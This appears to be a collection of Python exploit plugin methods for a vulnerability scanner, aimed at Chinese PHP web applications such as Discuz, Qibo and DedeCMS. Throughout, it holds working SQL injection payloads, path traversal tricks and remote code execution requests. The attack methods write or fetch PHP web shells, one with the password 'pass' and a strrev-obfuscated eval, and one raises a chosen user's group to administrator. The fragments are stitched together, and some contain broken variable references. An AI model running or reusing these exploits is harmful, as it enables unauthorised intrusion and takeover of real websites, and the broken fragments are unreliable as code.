def _attack(self):
result = Result()
phpPayload = "${@assert($_POST[alpha])}"
sig = '9876541'
self.params['mid'] = "1"
self.params['action'] = "search"
self.params['keyword'] = "asd"
self.params['postdb[city_id]'] = "../../admin/hack"
self.params['hack'] = "jfadmin"
self.params['action'] = "addjf"
self.params['Apower[jfadmin_mod]'] = "1"
self.params['fid'] = "1"
self.params['title'] = phpPayload
url = self.urlJoin("/search.php")
response1 = self.http.get(url, params=self.params)
payload = {"alpha": "print {0};".format(sig)}
url = url.replace("search.php", "do/jf.php")
response2 = self.http.post(url, data=payload)
if response2.status_code == 200:
if sig in response2.content:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.baseURL + "/do/jf.php"
result['ShellInfo']['Content'] = phpPayload
return result
def _verify(self):
result = Result()
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = {
"formhash":
"04949b0",
"srchtxt":
"aa",
"srchtype":
"threadsort",
"st":
"on",
"sortid":
"3",
"selectsortid":
"3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
.format(sig),
"searchsubmit":
"true"
}
url = self.urlJoin("/search.php")
response = self.http.post(url, data=payload)
if response.status_code == 200:
if sig in response.content and "SQL" in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = response.request.body
result['VerifyInfo']['Payload'] = response.request.body
return result
def _verify(self):
result = Result()
dctype = self.elseArgs.get("type", "discuz").lower()
if dctype not in ['discuz', 'discuzx']:
dctype = "discuz"
date = self.elseArgs.get("date", "15-01-01")
days = self.elseArgs.get("days", "10")
days = int(days)
dirs = self.elseArgs.get("dirs", "1")
dirs = int(dirs)
url = self.baseURL if ".php" in self.url else self.url
url = url.rstrip("/")
alives = []
for path in self.genPath(dctype, date, days, dirs):
try:
print "debug>>>>>>>>", url + path
response = self.http.get(url + path)
except self.http.RequestException:
pass
if response.status_code == 200:
print "debug=============================", url + path
alives.append(url + path)
if alives:
result['Else'] = {}
result['Else']['Target'] = self.url
result['Else']['Info'] = str(alives)
return result
def _verify(self):
result = Result()
phpPayload = "${@assert($_POST[alpha])}"
#phpPayload = "${@fwrite(fopen('ali.php', 'w+'),'test')}"
sig = '9876541'
self.params['mid'] = "1"
self.params['keyword'] = "asd"
self.params['postdb[city_id]'] = "../../admin/hack"
self.params['hack'] = "jfadmin"
self.params['action'] = "addjf"
self.params['Apower[jfadmin_mod]'] = "1"
self.params['fid'] = "1"
self.params['title'] = phpPayload
url = self.urlJoin("/search.php")
response1 = self.http.get(url, params=self.params)
payload = {"alpha": "print {0};".format(sig)}
url = url.replace("search.php", "do/jf.php")
response2 = self.http.post(url, data=payload)
if response2.status_code == 200:
if sig in response2.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = str(payload)
return result
def _attack(self):
result = Result()
vulfile = self.elseArgs.get("vulfile", None)
vulpath = self.elseArgs.get("vulpath", None)
if not vulfile or not vulpath:
print "Missing --elseargs, should be '--elseargs vulfile=shell.php#vulpath=http://aa.com'"
return []
self.params['step'] = "11"
self.params['insLockfile'] = "a"
self.params['s_lang'] = "a"
self.params['install_demo_name'] = "../data/admin/config_update.php"
url = self.urlJoin("/install/index.php")
response1 = self.http.get(url, params=self.params)
self.params['install_demo_name'] = vulfile
self.params['updateHost'] = vulpath
response2 = self.http.get(url, params=self.params)
url = url.replace("index.php", vulfile)
response3 = self.http.get(url)
#print "debug>>>>>",response.request.url
#print "debug>>>>>",response.content
if response3.status_code == 200:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = url
return result
def _verify(self):
result = Result()
result['Else'] = {}
result['Else']['Target'] = self.url
result['Else']['Info'] = self.genBypassLink()
return result
def _attack(self):
result = Result()
phpPayload = "phpinfo();"
sig = '_SERVER["HTTP_HOST"]'
url = self.urlJoin("/inc/splitword.php")
response = self.http.post(url, data={'Y2hlbmdzaGlzLmMjd':phpPayload})
if response.status_code == 200:
if sig in response.content:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = url
result['ShellInfo']['Content'] = "@eval($_POST['Y2hlbmdzaGlzLmMjd']);"
return result
def _verify(self):
result = Result()
phpPayload = "phpinfo();"
sig = '_SERVER["HTTP_HOST"]'
url = self.urlJoin("/inc/splitword.php")
response = self.http.post(url, data={'Y2hlbmdzaGlzLmMjd':phpPayload})
if response.status_code == 200:
if sig in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = phpPayload
return result
def _verify(self):
result = Result()
php_code = '''echo "asdfgh123456";'''
attack_payload = self._genPayload(php_code)
response = self.http.get(self.url,
headers={"User-Agent": attack_payload})
if response.status_code == 200:
response = session.get(self.url)
if response.status_code == 200 and 'asdfgh123456' in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = attack_payload
return result
def _verify(self):
result = Result()
sig = '2c1743a391305fbf367df8e4f069f9f9'
params = "?inc=edit_sort&act=modify&name[]=yyy"
payload = {"table_album": "{0}".format(sig)}
url = self.urlJoin("/blog/ajax.php")
response = self.http.post(url + params, params=payload)
if response.status_code == 200:
if sig in response.content and "doesn't exist" in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = response.request.url
return result
def _verify(self):
result = Result()
sig = '_SERVER["HTTP_HOST"]'
cookie = "GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
headers = dict()
headers['Cookie'] = cookie
response = self.http.get(self.url, headers=headers)
if response.status_code == 200:
if sig in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = cookie
return result
def _verify(self):
result = Result()
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = "1' and 1=2 union all select 1,'{0}".format(sig)
self.params['mod'] = "attachment"
self.params['findpost'] = "ss"
self.params['aid'] = base64.b64encode(payload)
url = self.urlJoin("/forum.php")
response = self.http.get(url, params=self.params)
if response.status_code == 200:
if sig in response.request.url:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
return result
def _verify(self):
result = Result()
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = "1 and select 1 from (select concat_ws(':', left(rand(), 3), {0}), count(*) from information_schema.tables group by 1)a;".format(
sig)
self.params['ac'] = 'view'
self.params['shopid'] = payload
url = self.urlJoin("/shop.php")
response = self.http.get(url, params=self.params)
if response.status_code == 200:
if sig in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
return result
def _attack(self):
result = Result()
#php_code = '''print "start-->|";echo __FILE__;'''
#php_code = '''print "start-->|";echo getcwd();'''
#php_code = '''$s='<?php @eval($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
php_code = '''$s='<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
attack_payload = self._genPayload(php_code)
response = self.http.get(self.url,
headers={"User-Agent": attack_payload})
if response.status_code == 200:
response = session.get(self.url)
response = session.get(self.urlJoin("/images/parse.php"))
if response.status_code == 200:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = "/images/parse.php?f=tressa"
result['ShellInfo']['Content'] = 'password: pass'
return result
def _attack(self):
result = Result()
uid = self.elseArgs.get("uid", "3")
params = "?inc=edit_sort&act=modify&name[]=yyy"
payload = {
"table_album":
"memberdata` set groupid=3 where uid={0}#".format(uid)
}
url = self.urlJoin("/blog/ajax.php")
response = self.http.post(url + params, params=payload)
if response.status_code == 200:
if sig in response.content and "doesn't exist" in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = response.request.url
return result
def _verify(self):
result = Result()
sig = '9876541'
params = "?inc=ol_module&step=2&moduleid=../../../../do/js&&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1"
payload = {
"pre":
"qb_label where lid=-1 UNION SELECT 1,2,3,4,5,6,0,{0},9,10,11,12,13,14,15,16,17,18,19#"
.format(sig)
}
url = self.urlJoin("/blog/ajax.php")
response = self.http.get(url + params, params=payload)
if response.status_code == 200:
if sig in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = response.request.url
return result
def _verify(self):
result = Result()
sig = u"才能浏览"
userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
#userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://**.**.**.**/search/spider.html)"
headers = {'User-Agent': userAgent}
response = self.http.get(self.url)
response2 = self.http.get(self.url, headers=headers)
if response2.status_code == 200:
if sig.encode("utf-8") in response.content and sig.encode(
"gbk") in response.content and sig.encode(
"utf-8") not in response2.content and sig.encode(
"gbk") not in response2.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = userAgent
return result
def _verify(self):
result = Result()
sig = '_SERVER["HTTP_HOST"]'
payload = "<?php phpinfo();?>"
params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/blue.htm&postdb[code]={0}".format(
payload)
url = self.urlJoin("/blog/ajax.php")
response = self.http.get(url + params)
params2 = "?inc=edit_sort&job=../../../../template/blue"
response2 = self.http.get(url + params2)
if response2.status_code == 200:
if sig in response2.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
return result
def _verify(self):
result = Result()
sig = '9876541'
params = "?step=1"
payload = {
"type":
"area where 1=(updatexml(1,concat(0x5e24,(select {0}),0x5e24),1))#"
.format(sig)
}
url = self.urlJoin("/blog/member/update_sort.php")
response = self.http.get(url + params, params=payload)
if response.status_code == 200:
if sig in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = response.request.url
return result
def _attack(self):
result = Result()
sig = u"才能浏览"
userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
headers = {'User-Agent': userAgent}
response = self.http.get(self.url)
response2 = self.http.get(self.url, headers=headers)
if response2.status_code == 200:
if sig.encode("utf-8") in response.content and sig.encode(
"gbk") in response.content and sig.encode(
"utf-8") not in response2.content and sig.encode(
"gbk") not in response2.content:
with open("result.html", "w") as fd:
fd.write(response2.conetnt)
result['FileInfo'] = {}
result['FileInfo']['Filename'] = "result.html"
return result
def _attack(self):
result = Result()
sig = "strrev"
payload = '<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>'
params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/green.htm&postdb[code]={0}".format(
payload)
url = self.urlJoin("/blog/ajax.php")
response = self.http.get(url + params)
url2 = url.replace("/blog/ajax.php", "/template/green.htm")
response2 = self.http.get(url2)
if response2.status_code == 200:
if sig in response2.content:
result['ShellInfo'] = {}
result['ShellInfo'][
'URL'] = url + "?inc=edit_sort&job=../../../../template/green&f=tressa"
result['ShellInfo']['Payload'] = "password: pass"
return result
def _verify(self):
result = Result()
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = {
"gids[99]":
"'",
"gids[100][0]":
") and (select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
.format(sig)
}
url = self.url if "faq.php" in self.url else self.host + "/faq.php?action=grouppermission"
response = self.http.post(url, data=payload)
if response.status_code == 200:
if sig in response.content and "SQL" in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = response.request.body
return result
def _verify(self):
result = Result()
sig = u"远程获取失败"
params['step'] = "11"
params['insLockfile'] = "a"
params['s_lang'] = "a"
params['install_demo_name'] = "../data/admin/config_update.php"
url = self.urlJoin("/install/index.php")
response = self.http.get(url, params=params)
#print "debug>>>>>",response.request.url
#print "debug>>>>>",response.content
if response.status_code == 200:
if sig.encode('gbk') in response.content or sig.encode(
'utf-8') in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = str(params)
return result